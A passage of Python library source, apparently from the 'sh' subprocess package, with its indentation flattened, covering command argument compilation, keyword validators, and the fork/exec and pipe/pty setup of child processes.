self.process._stdin_process.command.wait()
self.log.info("process completed")
return self
def handle_command_exit_code(self, code):
""" here we determine if we had an exception, or an error code that we
weren't expecting to see. if we did, we create and raise an exception
"""
ca = self.call_args
exc_class = get_exc_exit_code_would_raise(code, ca["ok_code"],
ca["piped"])
if exc_class:
exc = exc_class(self.ran, self.process.stdout, self.process.stderr,
ca["truncate_exc"])
raise exc
@property
def stdout(self):
self.wait()
return self.process.stdout
@property
def stderr(self):
self.wait()
return self.process.stderr
@property
def exit_code(self):
self.wait()
return self.process.exit_code
def __len__(self):
return len(str(self))
def __enter__(self):
""" we don't actually do anything here because anything that should have
been done would have been done in the Command.__call__ call.
essentially all that has to happen is the comand be pushed on the
prepend stack. """
pass
def __iter__(self):
return self
def next(self):
""" allow us to iterate over the output of our command """
if self._stopped_iteration:
raise StopIteration()
# we do this because if get blocks, we can't catch a KeyboardInterrupt
# so the slight timeout allows for that.
while True:
try:
chunk = self.process._pipe_queue.get(True, 0.001)
except Empty:
if self.call_args["iter_noblock"]:
return errno.EWOULDBLOCK
else:
if chunk is None:
self.wait()
self._stopped_iteration = True
raise StopIteration()
try:
return chunk.decode(self.call_args["encoding"],
self.call_args["decode_errors"])
except UnicodeDecodeError:
return chunk
# python 3
__next__ = next
def __exit__(self, typ, value, traceback):
if self.call_args["with"] and get_prepend_stack():
get_prepend_stack().pop()
def __str__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
if IS_PY3:
return self.__unicode__()
else:
return unicode(self).encode(self.call_args["encoding"])
def __unicode__(self):
""" a magic method defined for python2. calling unicode() on a
RunningCommand object will call this """
if self.process and self.stdout:
return self.stdout.decode(self.call_args["encoding"],
self.call_args["decode_errors"])
elif IS_PY3:
return ""
else:
return unicode("")
def __eq__(self, other):
return unicode(self) == unicode(other)
__hash__ = None # Avoid DeprecationWarning in Python < 3
def __contains__(self, item):
return item in str(self)
def __getattr__(self, p):
# let these three attributes pass through to the OProc object
if p in self._OProc_attr_whitelist:
if self.process:
return getattr(self.process, p)
else:
raise AttributeError
# see if strings have what we're looking for. we're looking at the
# method names explicitly because we don't want to evaluate self unless
# we absolutely have to, the reason being, in python2, hasattr swallows
# exceptions, and if we try to run hasattr on a command that failed and
# is being run with _iter=True, the command will be evaluated, throw an
# exception, but hasattr will discard it
if p in _unicode_methods:
return getattr(unicode(self), p)
raise AttributeError
def __repr__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
try:
return str(self)
except UnicodeDecodeError:
if self.process:
if self.stdout:
return repr(self.stdout)
return repr("")
def __long__(self):
return long(str(self).strip())
def __float__(self):
return float(str(self).strip())
def __int__(self):
return int(str(self).strip())
def output_redirect_is_filename(out):
return isinstance(out, basestring)
def get_prepend_stack():
tl = Command.thread_local
if not hasattr(tl, "_prepend_stack"):
tl._prepend_stack = []
return tl._prepend_stack
def special_kwarg_validator(kwargs, invalid_list):
s1 = set(kwargs.keys())
invalid_args = []
for args in invalid_list:
if callable(args):
fn = args
ret = fn(kwargs)
invalid_args.extend(ret)
else:
args, error_msg = args
if s1.issuperset(args):
invalid_args.append((args, error_msg))
return invalid_args
def get_fileno(ob):
# in py2, this will return None. in py3, it will return an method that
# raises when called
fileno_meth = getattr(ob, "fileno", None)
fileno = None
if fileno_meth:
# py3 StringIO objects will report a fileno, but calling it will raise
# an exception
try:
fileno = fileno_meth()
except UnsupportedOperation:
pass
elif isinstance(ob, (int,long)) and ob >= 0:
fileno = ob
return fileno
def ob_is_tty(ob):
""" checks if an object (like a file-like object) is a tty. """
fileno = get_fileno(ob)
is_tty = False
if fileno is not None:
is_tty = os.isatty(fileno)
return is_tty
def ob_is_pipe(ob):
fileno = get_fileno(ob)
is_pipe = False
if fileno:
fd_stat = os.fstat(fileno)
is_pipe = stat.S_ISFIFO(fd_stat.st_mode)
return is_pipe
def tty_in_validator(kwargs):
pairs = (("tty_in", "in"), ("tty_out", "out"))
invalid = []
for tty, std in pairs:
if tty in kwargs and ob_is_tty(kwargs.get(std, None)):
args = (tty, std)
error = "`_%s` is a TTY already, so so it doesn't make sense \
to set up a TTY with `_%s`" % (std, tty)
invalid.append((args, error))
return invalid
def bufsize_validator(kwargs):
""" a validator to prevent a user from saying that they want custom
buffering when they're using an in/out object that will be os.dup'd to the
process, and has its own buffering. an example is a pipe or a tty. it
doesn't make sense to tell them to have a custom buffering, since the os
controls this. """
invalid = []
in_ob = kwargs.get("in", None)
out_ob = kwargs.get("out", None)
in_buf = kwargs.get("in_bufsize", None)
out_buf = kwargs.get("out_bufsize", None)
in_no_buf = ob_is_tty(in_ob) or ob_is_pipe(in_ob)
out_no_buf = ob_is_tty(out_ob) or ob_is_pipe(out_ob)
err = "Can't specify an {target} bufsize if the {target} target is a pipe or TTY"
if in_no_buf and in_buf is not None:
invalid.append((("in", "in_bufsize"), err.format(target="in")))
if out_no_buf and out_buf is not None:
invalid.append((("out", "out_bufsize"), err.format(target="out")))
return invalid
def env_validator(kwargs):
""" a validator to check that env is a dictionary and that all environment variable
keys and values are strings. Otherwise, we would exit with a confusing exit code 255. """
invalid = []
env = kwargs.get("env", None)
if env is None:
return invalid
if not isinstance(env, dict):
invalid.append((("env"), "env must be a dict. Got {!r}".format(env)))
return invalid
for k, v in kwargs["env"].items():
if not isinstance(k, str):
invalid.append((("env"), "env key {!r} must be a str".format(k)))
if not isinstance(v, str):
invalid.append((("env"), "value {!r} of env key {!r} must be a str".format(v, k)))
return invalid
class Command(object):
""" represents an un-run system program, like "ls" or "cd". because it
represents the program itself (and not a running instance of it), it should
hold very little state. in fact, the only state it does hold is baked
arguments.
when a Command object is called, the result that is returned is a
RunningCommand object, which represents the Command put into an execution
state. """
thread_local = threading.local()
_call_args = {
"fg": False, # run command in foreground
# run a command in the background. commands run in the background
# ignore SIGHUP and do not automatically exit when the parent process
# ends
"bg": False,
# automatically report exceptions for background commands
"bg_exc": True,
"with": False, # prepend the command to every command after it
"in": None,
"out": None, # redirect STDOUT
"err": None, # redirect STDERR
"err_to_out": None, # redirect STDERR to STDOUT
# stdin buffer size
# 1 for line, 0 for unbuffered, any other number for that amount
"in_bufsize": 0,
# stdout buffer size, same values as above
"out_bufsize": 1,
"err_bufsize": 1,
# this is how big the output buffers will be for stdout and stderr.
# this is essentially how much output they will store from the process.
# we use a deque, so if it overflows past this amount, the first items
# get pushed off as each new item gets added.
#
# NOTICE
# this is not a *BYTE* size, this is a *CHUNK* size...meaning, that if
# you're buffering out/err at 1024 bytes, the internal buffer size will
# be "internal_bufsize" CHUNKS of 1024 bytes
"internal_bufsize": 3 * 1024 ** 2,
"env": None,
"piped": None,
"iter": None,
"iter_noblock": None,
"ok_code": 0,
"cwd": None,
# the separator delimiting between a long-argument's name and its value
# setting this to None will cause name and value to be two separate
# arguments, like for short options
# for example, --arg=derp, '=' is the long_sep
"long_sep": "=",
# the prefix used for long arguments
"long_prefix": "--",
# this is for programs that expect their input to be from a terminal.
# ssh is one of those programs
"tty_in": False,
"tty_out": True,
"encoding": DEFAULT_ENCODING,
"decode_errors": "strict",
# how long the process should run before it is auto-killed
"timeout": None,
"timeout_signal": signal.SIGKILL,
# TODO write some docs on "long-running processes"
# these control whether or not stdout/err will get aggregated together
# as the process runs. this has memory usage implications, so sometimes
# with long-running processes with a lot of data, it makes sense to
# set these to true
"no_out": False,
"no_err": False,
"no_pipe": False,
# if any redirection is used for stdout or stderr, internal buffering
# of that data is not stored. this forces it to be stored, as if
# the output is being T'd to both the redirected destination and our
# internal buffers
"tee": None,
# will be called when a process terminates regardless of exception
"done": None,
# a tuple (rows, columns) of the desired size of both the stdout and
# stdin ttys, if ttys are being used
"tty_size": (20, 80),
# whether or not our exceptions should be truncated
"truncate_exc": True,
# a function to call after the child forks but before the process execs
"preexec_fn": None,
# UID to set after forking. Requires root privileges. Not supported on
# Windows.
"uid": None,
# put the forked process in its own process session?
"new_session": True,
# pre-process args passed into __call__. only really useful when used
# in .bake()
"arg_preprocess": None,
# a callable that produces a log message from an argument tuple of the
# command and the args
"log_msg": None,
# whether or not to close all inherited fds. typically, this should be True, as inheriting fds can be a security
# vulnerability
"close_fds": True,
# a whitelist of the integer fds to pass through to the child process. setting this forces close_fds to be True
"pass_fds": set(),
}
# this is a collection of validators to make sure the special kwargs make
# sense
_kwarg_validators = (
(("fg", "bg"), "Command can't be run in the foreground and background"),
(("fg", "err_to_out"), "Can't redirect STDERR in foreground mode"),
(("err", "err_to_out"), "Stderr is already being redirected"),
(("piped", "iter"), "You cannot iterate when this command is being piped"),
(("piped", "no_pipe"), "Using a pipe doesn't make sense if you've disabled the pipe"),
(("no_out", "iter"), "You cannot iterate over output if there is no output"),
(("close_fds", "pass_fds"), "Passing `pass_fds` forces `close_fds` to be True"),
tty_in_validator,
bufsize_validator,
env_validator,
)
def __init__(self, path, search_paths=None):
found = which(path, search_paths)
self._path = encode_to_py3bytes_or_py2str("")
# is the command baked (aka, partially applied)?
self._partial = False
self._partial_baked_args = []
self._partial_call_args = {}
# bugfix for functools.wraps. issue #121
self.__name__ = str(self)
if not found:
raise CommandNotFound(path)
# the reason why we set the values early in the constructor, and again
# here, is for people who have tools that inspect the stack on
# exception. if CommandNotFound is raised, we need self._path and the
# other attributes to be set correctly, so repr() works when they're
# inspecting the stack. issue #304
self._path = encode_to_py3bytes_or_py2str(found)
self.__name__ = str(self)
def __getattribute__(self, name):
# convenience
getattr = partial(object.__getattribute__, self)
val = None
if name.startswith("_"):
val = getattr(name)
elif name == "bake":
val = getattr("bake")
# here we have a way of getting past shadowed subcommands. for example,
# if "git bake" was a thing, we wouldn't be able to do `git.bake()`
# because `.bake()` is already a method. so we allow `git.bake_()`
elif name.endswith("_"):
name = name[:-1]
if val is None:
val = getattr("bake")(name)
return val
@staticmethod
def _extract_call_args(kwargs):
""" takes kwargs that were passed to a command's __call__ and extracts
out the special keyword arguments, we return a tuple of special keyword
args, and kwargs that will go to the execd command """
kwargs = kwargs.copy()
call_args = {}
for parg, default in Command._call_args.items():
key = "_" + parg
if key in kwargs:
call_args[parg] = kwargs[key]
del kwargs[key]
invalid_kwargs = special_kwarg_validator(call_args,
Command._kwarg_validators)
if invalid_kwargs:
exc_msg = []
for args, error_msg in invalid_kwargs:
exc_msg.append(" %r: %s" % (args, error_msg))
exc_msg = "\n".join(exc_msg)
raise TypeError("Invalid special arguments:\n\n%s\n" % exc_msg)
return call_args, kwargs
# TODO needs documentation
def bake(self, *args, **kwargs):
fn = type(self)(self._path)
fn._partial = True
call_args, kwargs = self._extract_call_args(kwargs)
pruned_call_args = call_args
for k, v in Command._call_args.items():
try:
if pruned_call_args[k] == v:
del pruned_call_args[k]
except KeyError:
continue
fn._partial_call_args.update(self._partial_call_args)
fn._partial_call_args.update(pruned_call_args)
fn._partial_baked_args.extend(self._partial_baked_args)
sep = pruned_call_args.get("long_sep", self._call_args["long_sep"])
prefix = pruned_call_args.get("long_prefix",
self._call_args["long_prefix"])
fn._partial_baked_args.extend(compile_args(args, kwargs, sep, prefix))
return fn
def __str__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
if IS_PY3:
return self.__unicode__()
else:
return self.__unicode__().encode(DEFAULT_ENCODING)
def __eq__(self, other):
return str(self) == str(other)
__hash__ = None # Avoid DeprecationWarning in Python < 3
def __repr__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
return "<Command %r>" % str(self)
def __unicode__(self):
""" a magic method defined for python2. calling unicode() on a
self will call this """
baked_args = " ".join(item.decode(DEFAULT_ENCODING) for item in self._partial_baked_args)
if baked_args:
baked_args = " " + baked_args
return self._path.decode(DEFAULT_ENCODING) + baked_args
def __enter__(self):
self(_with=True)
def __exit__(self, typ, value, traceback):
get_prepend_stack().pop()
def __call__(self, *args, **kwargs):
kwargs = kwargs.copy()
args = list(args)
# this will hold our final command, including arguments, that will be
# execd
cmd = []
# this will hold a complete mapping of all our special keyword arguments
# and their values
call_args = Command._call_args.copy()
# aggregate any 'with' contexts
for prepend in get_prepend_stack():
pcall_args = prepend.call_args.copy()
# don't pass the 'with' call arg
pcall_args.pop("with", None)
call_args.update(pcall_args)
cmd.extend(prepend.cmd)
cmd.append(self._path)
# do we have an argument pre-processor? if so, run it. we need to do
# this early, so that args, kwargs are accurate
preprocessor = self._partial_call_args.get("arg_preprocess", None)
if preprocessor:
args, kwargs = preprocessor(args, kwargs)
# here we extract the special kwargs and override any
# special kwargs from the possibly baked command
extracted_call_args, kwargs = self._extract_call_args(kwargs)
call_args.update(self._partial_call_args)
call_args.update(extracted_call_args)
# handle a None. this is added back only to not break the api in the
# 1.* version. TODO remove this in 2.0, as "ok_code", if specified,
# should always be a definitive value or list of values, and None is
# ambiguous
if call_args["ok_code"] is None:
call_args["ok_code"] = 0
if not getattr(call_args["ok_code"], "__iter__", None):
call_args["ok_code"] = [call_args["ok_code"]]
# check if we're piping via composition
stdin = call_args["in"]
if args:
first_arg = args.pop(0)
if isinstance(first_arg, RunningCommand):
if first_arg.call_args["piped"]:
stdin = first_arg.process
else:
stdin = first_arg.process._pipe_queue
else:
args.insert(0, first_arg)
processed_args = compile_args(args, kwargs, call_args["long_sep"],
call_args["long_prefix"])
# makes sure our arguments are broken up correctly
split_args = self._partial_baked_args + processed_args
final_args = split_args
cmd.extend(final_args)
# if we're running in foreground mode, we need to completely bypass
# launching a RunningCommand and OProc and just do a spawn
if call_args["fg"]:
if call_args["env"] is None:
launch = lambda: os.spawnv(os.P_WAIT, cmd[0], cmd)
else:
launch = lambda: os.spawnve(os.P_WAIT, cmd[0], cmd, call_args["env"])
exit_code = launch()
exc_class = get_exc_exit_code_would_raise(exit_code,
call_args["ok_code"], call_args["piped"])
if exc_class:
if IS_PY3:
ran = " ".join([arg.decode(DEFAULT_ENCODING, "ignore") for arg in cmd])
else:
ran = " ".join(cmd)
exc = exc_class(ran, b"", b"", call_args["truncate_exc"])
raise exc
return None
# stdout redirection
stdout = call_args["out"]
if output_redirect_is_filename(stdout):
stdout = open(str(stdout), "wb")
# stderr redirection
stderr = call_args["err"]
if output_redirect_is_filename(stderr):
stderr = open(str(stderr), "wb")
return RunningCommand(cmd, call_args, stdin, stdout, stderr)
def compile_args(args, kwargs, sep, prefix):
""" takes args and kwargs, as they were passed into the command instance
being executed with __call__, and compose them into a flat list that
will eventually be fed into exec. example:
with this call:
sh.ls("-l", "/tmp", color="never")
this function receives
args = ['-l', '/tmp']
kwargs = {'color': 'never'}
and produces
['-l', '/tmp', '--color=never']
"""
processed_args = []
encode = encode_to_py3bytes_or_py2str
# aggregate positional args
for arg in args:
if isinstance(arg, (list, tuple)):
if isinstance(arg, GlobResults) and not arg:
arg = [arg.path]
for sub_arg in arg:
processed_args.append(encode(sub_arg))
elif isinstance(arg, dict):
processed_args += aggregate_keywords(arg, sep, prefix, raw=True)
else:
processed_args.append(encode(arg))
# aggregate the keyword arguments
processed_args += aggregate_keywords(kwargs, sep, prefix)
return processed_args
def aggregate_keywords(keywords, sep, prefix, raw=False):
""" take our keyword arguments, and a separator, and compose the list of
flat long (and short) arguments. example
{'color': 'never', 't': True, 'something': True} with sep '='
becomes
['--color=never', '-t', '--something']
the `raw` argument indicates whether or not we should leave the argument
name alone, or whether we should replace "_" with "-". if we pass in a
dictionary, like this:
sh.command({"some_option": 12})
then `raw` gets set to True, because we want to leave the key as-is, to
produce:
['--some_option=12']
but if we just use a command's kwargs, `raw` is False, which means this:
sh.command(some_option=12)
becomes:
['--some-option=12']
eessentially, using kwargs is a convenience, but it lacks the ability to
put a '-' in the name, so we do the replacement of '_' to '-' for you.
but when you really don't want that to happen, you should use a
dictionary instead with the exact names you want
"""
processed = []
encode = encode_to_py3bytes_or_py2str
for k, v in keywords.items():
# we're passing a short arg as a kwarg, example:
# cut(d="\t")
if len(k) == 1:
if v is not False:
processed.append(encode("-" + k))
if v is not True:
processed.append(encode(v))
# we're doing a long arg
else:
if not raw:
k = k.replace("_", "-")
if v is True:
processed.append(encode(prefix + k))
elif v is False:
pass
elif sep is None or sep == " ":
processed.append(encode(prefix + k))
processed.append(encode(v))
else:
arg = encode("%s%s%s%s" % (prefix, k, sep, v))
processed.append(arg)
return processed
def _start_daemon_thread(fn, name, exc_queue, *args):
def wrap(*args, **kwargs):
try:
fn(*args, **kwargs)
except Exception as e:
exc_queue.put(e)
raise
thrd = threading.Thread(target=wrap, name=name, args=args)
thrd.daemon = True
thrd.start()
return thrd
def setwinsize(fd, rows_cols):
""" set the terminal size of a tty file descriptor. borrowed logic
from pexpect.py """
rows, cols = rows_cols
TIOCSWINSZ = getattr(termios, 'TIOCSWINSZ', -2146929561)
s = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(fd, TIOCSWINSZ, s)
def construct_streamreader_callback(process, handler):
""" here we're constructing a closure for our streamreader callback. this
is used in the case that we pass a callback into _out or _err, meaning we
want to our callback to handle each bit of output
we construct the closure based on how many arguments it takes. the reason
for this is to make it as easy as possible for people to use, without
limiting them. a new user will assume the callback takes 1 argument (the
data). as they get more advanced, they may want to terminate the process,
or pass some stdin back, and will realize that they can pass a callback of
more args """
# implied arg refers to the "self" that methods will pass in. we need to
# account for this implied arg when figuring out what function the user
# passed in based on number of args
implied_arg = 0
partial_args = 0
handler_to_inspect = handler
if isinstance(handler, partial):
partial_args = len(handler.args)
handler_to_inspect = handler.func
if inspect.ismethod(handler_to_inspect):
implied_arg = 1
num_args = get_num_args(handler_to_inspect)
else:
if inspect.isfunction(handler_to_inspect):
num_args = get_num_args(handler_to_inspect)
# is an object instance with __call__ method
else:
implied_arg = 1
num_args = get_num_args(handler_to_inspect.__call__)
net_args = num_args - implied_arg - partial_args
handler_args = ()
# just the chunk
if net_args == 1:
handler_args = ()
# chunk, stdin
if net_args == 2:
handler_args = (process.stdin,)
# chunk, stdin, process
elif net_args == 3:
# notice we're only storing a weakref, to prevent cyclic references
# (where the process holds a streamreader, and a streamreader holds a
# handler-closure with a reference to the process
handler_args = (process.stdin, weakref.ref(process))
def fn(chunk):
# this is pretty ugly, but we're evaluating the process at call-time,
# because it's a weakref
args = handler_args
if len(args) == 2:
args = (handler_args[0], handler_args[1]())
return handler(chunk, *args)
return fn
def get_exc_exit_code_would_raise(exit_code, ok_codes, sigpipe_ok):
exc = None
success = exit_code in ok_codes
bad_sig = -exit_code in SIGNALS_THAT_SHOULD_THROW_EXCEPTION
# if this is a piped command, SIGPIPE must be ignored by us and not raise an
# exception, since it's perfectly normal for the consumer of a process's
# pipe to terminate early
if sigpipe_ok and -exit_code == signal.SIGPIPE:
bad_sig = False
success = True
if not success or bad_sig:
exc = get_rc_exc(exit_code)
return exc
def handle_process_exit_code(exit_code):
""" this should only ever be called once for each child process """
# if we exited from a signal, let our exit code reflect that
if os.WIFSIGNALED(exit_code):
exit_code = -os.WTERMSIG(exit_code)
# otherwise just give us a normal exit code
elif os.WIFEXITED(exit_code):
exit_code = os.WEXITSTATUS(exit_code)
else:
raise RuntimeError("Unknown child exit status!")
return exit_code
def no_interrupt(syscall, *args, **kwargs):
""" a helper for making system calls immune to EINTR """
ret = None
while True:
try:
ret = syscall(*args, **kwargs)
except OSError as e:
if e.errno == errno.EINTR:
continue
else:
raise
else:
break
return ret
class OProc(object):
""" this class is instantiated by RunningCommand for a command to be exec'd.
it handles all the nasty business involved with correctly setting up the
input/output to the child process. it gets its name for subprocess.Popen
(process open) but we're calling ours OProc (open process) """
_default_window_size = (24, 80)
# used in redirecting
STDOUT = -1
STDERR = -2
def __init__(self, command, parent_log, cmd, stdin, stdout, stderr,
call_args, pipe, process_assign_lock):
"""
cmd is the full string that will be exec'd. it includes the program
name and all its arguments
stdin, stdout, stderr are what the child will use for standard
input/output/err
call_args is a mapping of all the special keyword arguments to apply
to the child process
"""
self.command = command
self.call_args = call_args
# convenience
ca = self.call_args
if ca["uid"] is not None:
if os.getuid() != 0:
raise RuntimeError("UID setting requires root privileges")
target_uid = ca["uid"]
pwrec = pwd.getpwuid(ca["uid"])
target_gid = pwrec.pw_gid
# I had issues with getting 'Input/Output error reading stdin' from dd,
# until I set _tty_out=False
if ca["piped"]:
ca["tty_out"] = False
self._stdin_process = None
# if the objects that we are passing to the OProc happen to be a
# file-like object that is a tty, for example `sys.stdin`, then, later
# on in this constructor, we're going to skip out on setting up pipes
# and pseudoterminals for those endpoints
stdin_is_tty_or_pipe = ob_is_tty(stdin) or ob_is_pipe(stdin)
stdout_is_tty_or_pipe = ob_is_tty(stdout) or ob_is_pipe(stdout)
stderr_is_tty_or_pipe = ob_is_tty(stderr) or ob_is_pipe(stderr)
tee_out = ca["tee"] in (True, "out")
tee_err = ca["tee"] == "err"
# if we're passing in a custom stdout/out/err value, we obviously have
# to force not using single_tty
custom_in_out_err = stdin or stdout or stderr
single_tty = (ca["tty_in"] and ca["tty_out"])\
and not custom_in_out_err
# this logic is a little convoluted, but basically this top-level
# if/else is for consolidating input and output TTYs into a single
# TTY. this is the only way some secure programs like ssh will
# output correctly (is if stdout and stdin are both the same TTY)
if single_tty:
self._stdin_read_fd, self._stdin_write_fd = pty.openpty()
self._stdout_read_fd = os.dup(self._stdin_read_fd)
self._stdout_write_fd = os.dup(self._stdin_write_fd)
self._stderr_read_fd = os.dup(self._stdin_read_fd)
self._stderr_write_fd = os.dup(self._stdin_write_fd)
# do not consolidate stdin and stdout. this is the most common use-
# case
else:
# this check here is because we may be doing piping and so our stdin
# might be an instance of OProc
if isinstance(stdin, OProc) and stdin.call_args["piped"]:
self._stdin_write_fd = stdin._pipe_fd
self._stdin_read_fd = None
self._stdin_process = stdin
elif stdin_is_tty_or_pipe:
self._stdin_write_fd = os.dup(get_fileno(stdin))
self._stdin_read_fd = None
elif ca["tty_in"]:
self._stdin_read_fd, self._stdin_write_fd = pty.openpty()
# tty_in=False is the default
else:
self._stdin_write_fd, self._stdin_read_fd = os.pipe()
if stdout_is_tty_or_pipe and not tee_out:
self._stdout_write_fd = os.dup(get_fileno(stdout))
self._stdout_read_fd = None
# tty_out=True is the default
elif ca["tty_out"]:
self._stdout_read_fd, self._stdout_write_fd = pty.openpty()
else:
self._stdout_read_fd, self._stdout_write_fd = os.pipe()
# unless STDERR is going to STDOUT, it ALWAYS needs to be a pipe,
# and never a PTY. the reason for this is not totally clear to me,
# but it has to do with the fact that if STDERR isn't set as the
# CTTY (because STDOUT is), the STDERR buffer won't always flush
# by the time the process exits, and the data will be lost.
# i've only seen this on OSX.
if stderr is OProc.STDOUT:
# if stderr is going to stdout, but stdout is a tty or a pipe,
# we should not specify a read_fd, because stdout is dup'd
# directly to the stdout fd (no pipe), and so stderr won't have
# a slave end of a pipe either to dup
if stdout_is_tty_or_pipe and not tee_out:
self._stderr_read_fd = None
else:
self._stderr_read_fd = os.dup(self._stdout_read_fd)
self._stderr_write_fd = os.dup(self._stdout_write_fd)
elif stderr_is_tty_or_pipe and not tee_err:
self._stderr_write_fd = os.dup(get_fileno(stderr))
self._stderr_read_fd = None
else:
self._stderr_read_fd, self._stderr_write_fd = os.pipe()
piped = ca["piped"]
self._pipe_fd = None
if piped:
fd_to_use = self._stdout_read_fd
if piped == "err":
fd_to_use = self._stderr_read_fd
self._pipe_fd = os.dup(fd_to_use)
new_session = ca["new_session"]
needs_ctty = ca["tty_in"] and new_session
self.ctty = None
if needs_ctty:
self.ctty = os.ttyname(self._stdin_write_fd)
# this is a hack, but what we're doing here is intentionally throwing an
# OSError exception if our child processes's directory doesn't exist,
# but we're doing it BEFORE we fork. the reason for before the fork is
# error handling. i'm currently too lazy to implement what
# subprocess.py did and set up a error pipe to handle exceptions that
# happen in the child between fork and exec. it has only been seen in
# the wild for a missing cwd, so we'll handle it here.
cwd = ca["cwd"]
if cwd is not None and not os.path.exists(cwd):
os.chdir(cwd)
gc_enabled = gc.isenabled()
if gc_enabled:
gc.disable()
# for synchronizing
session_pipe_read, session_pipe_write = os.pipe()
exc_pipe_read, exc_pipe_write = os.pipe()
# this pipe is for synchronizing with the child that the parent has
# closed its in/out/err fds. this is a bug on OSX (but not linux),
# where we can lose output sometimes, due to a race, if we do
# os.close(self._stdout_write_fd) in the parent after the child starts
# writing.
if IS_OSX:
close_pipe_read, close_pipe_write = os.pipe()
# session id, group id, process id
self.sid = None
self.pgid = None
self.pid = os.fork()
# child
if self.pid == 0: # pragma: no cover
if IS_OSX:
os.read(close_pipe_read, 1)
os.close(close_pipe_read)
os.close(close_pipe_write)
# this is critical
# our exc_pipe_write must have CLOEXEC enabled. the reason for this is tricky:
# if our child (the block we're in now), has an exception, we need to be able to write to exc_pipe_write, so
# that when the parent does os.read(exc_pipe_read), it gets our traceback. however, os.read(exc_pipe_read)
# in the parent blocks, so if our child *doesn't* have an exception, and doesn't close the writing end, it
# hangs forever. not good! but obviously the child can't close the writing end until it knows it's not
# going to have an exception, which is impossible to know because but what if os.execv has an exception? so
# the answer is CLOEXEC, so that the writing end of the pipe gets closed upon successful exec, and the
# parent reading the read end won't block (close breaks the block).
flags = fcntl.fcntl(exc_pipe_write, fcntl.F_GETFD)
flags |= fcntl.FD_CLOEXEC
fcntl.fcntl(exc_pipe_write, fcntl.F_SETFD, flags)
try:
# ignoring SIGHUP lets us persist even after the parent process
# exits. only ignore if we're backgrounded
if ca["bg"] is True:
signal.signal(signal.SIGHUP, signal.SIG_IGN)
# python ignores SIGPIPE by default. we must make sure to put
# this behavior back to the default for spawned processes,
# otherwise SIGPIPE won't kill piped processes, which is what we
# need, so that we can check the error code of the killed
# process to see that SIGPIPE killed it
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
# put our forked process in a new session? this will relinquish
# any control of our inherited CTTY and also make our parent
# process init
if new_session:
os.setsid()
# if we're not going in a new session, we should go in a new
# process group. this way, our process, and any children it
# spawns, are alone, contained entirely in one group. if we
# didn't do this, and didn't use a new session, then our exec'd
# process *could* exist in the same group as our python process,
# depending on how we launch the process (from a shell, or some
# other way)
else:
os.setpgrp()
sid = os.getsid(0)
pgid = os.getpgid(0)
payload = ("%d,%d" % (sid, pgid)).encode(DEFAULT_ENCODING)
os.write(session_pipe_write, payload)
if ca["tty_out"] and not stdout_is_tty_or_pipe and not single_tty:
# set raw mode, so there isn't any weird translation of
# newlines to \r\n and other oddities. we're not outputting
# to a terminal anyways
#
# we HAVE to do this here, and not in the parent process,
# because we have to guarantee that this is set before the
# child process is run, and we can't do it twice.
tty.setraw(self._stdout_write_fd)
# if the parent-side fd for stdin exists, close it. the case
# where it may not exist is if we're using piping
if self._stdin_read_fd:
os.close(self._stdin_read_fd)
if self._stdout_read_fd:
os.close(self._stdout_read_fd)
if self._stderr_read_fd:
os.close(self._stderr_read_fd)
os.close(session_pipe_read)
os.close(exc_pipe_read)
if cwd:
os.chdir(cwd)
os.dup2(self._stdin_write_fd, 0)
os.dup2(self._stdout_write_fd, 1)
os.dup2(self._stderr_write_fd, 2)
# set our controlling terminal, but only if we're using a tty
# for stdin. it doesn't make sense to have a ctty otherwise
if needs_ctty:
tmp_fd = os.open(os.ttyname(0), os.O_RDWR)
os.close(tmp_fd)
if ca["tty_out"] and not stdout_is_tty_or_pipe:
setwinsize(1, ca["tty_size"])
if ca["uid"] is not None:
os.setgid(target_gid)
os.setuid(target_uid)
preexec_fn = ca["preexec_fn"]
if callable(preexec_fn):
preexec_fn()
close_fds = ca["close_fds"]
if ca["pass_fds"]:
close_fds = True
if close_fds:
pass_fds = set((0, 1, 2, exc_pipe_write))
pass_fds.update(ca["pass_fds"])
# don't inherit file descriptors
inherited_fds = os.listdir("/dev/fd")
inherited_fds = set(int(fd) for fd in inherited_fds) - pass_fds
for fd in inherited_fds:
try:
os.close(fd)
except OSError:
pass
# actually execute the process
if ca["env"] is None:
os.execv(cmd[0], cmd)
else:
os.execve(cmd[0], cmd, ca["env"])
# we must ensure that we carefully exit the child process on
# exception, otherwise the parent process code will be executed
# twice on exception https://github.com/amoffat/sh/issues/202
#
# if your parent process experiences an exit code 255, it is most
# likely that an exception occurred between the fork of the child
# and the exec. this should be reported.
except:
# some helpful debugging
tb = traceback.format_exc().encode("utf8", "ignore")
try:
os.write(exc_pipe_write, tb)
except Exception as e:
# dump to stderr if we cannot save it to exc_pipe_write
sys.stderr.write("\nFATAL SH ERROR: %s\n" % e)
finally:
os._exit(255)
# parent
else:
if gc_enabled:
gc.enable()
os.close(self._stdin_write_fd)
os.close(self._stdout_write_fd)
os.close(self._stderr_write_fd)
# tell our child process that we've closed our write_fds, so it is
# ok to proceed towards exec. see the comment where this pipe is
# opened, for why this is necessary
if IS_OSX:
os.close(close_pipe_read)
os.write(close_pipe_write, str(1).encode(DEFAULT_ENCODING))
os.close(close_pipe_write)
os.close(exc_pipe_write)
fork_exc = os.read(exc_pipe_read, 1024**2)
os.close(exc_pipe_read)
if fork_exc:
fork_exc = fork_exc.decode(DEFAULT_ENCODING)
raise ForkException(fork_exc)
os.close(session_pipe_write)
sid, pgid = os.read(session_pipe_read,
1024).decode(DEFAULT_ENCODING).split(",")
os.close(session_pipe_read)
self.sid = int(sid)
self.pgid = int(pgid)
# used to determine what exception to raise. if our process was
# killed via a timeout counter, we'll raise something different than
# a SIGKILL exception
self.timed_out = False
self.started = time.time()
self.cmd = cmd
# exit code should only be manipulated from within self._wait_lock
# to prevent race conditions
self.exit_code = None
self.stdin = stdin or Queue()
# _pipe_queue is used internally to hand off stdout from one process
# to another. by default, all stdout from a process gets dumped
# into this pipe queue, to be consumed in real time (hence the
# thread-safe Queue), or at a potentially later time
self._pipe_queue = Queue()
# this is used to prevent a race condition when we're waiting for
# a process to end, and the OProc's internal threads are also checking
# for the processes's end
self._wait_lock = threading.Lock()
# these are for aggregating the stdout and stderr. we use a deque
# because we don't want to overflow
self._stdout = deque(maxlen=ca["internal_bufsize"])
self._stderr = deque(maxlen=ca["internal_bufsize"])
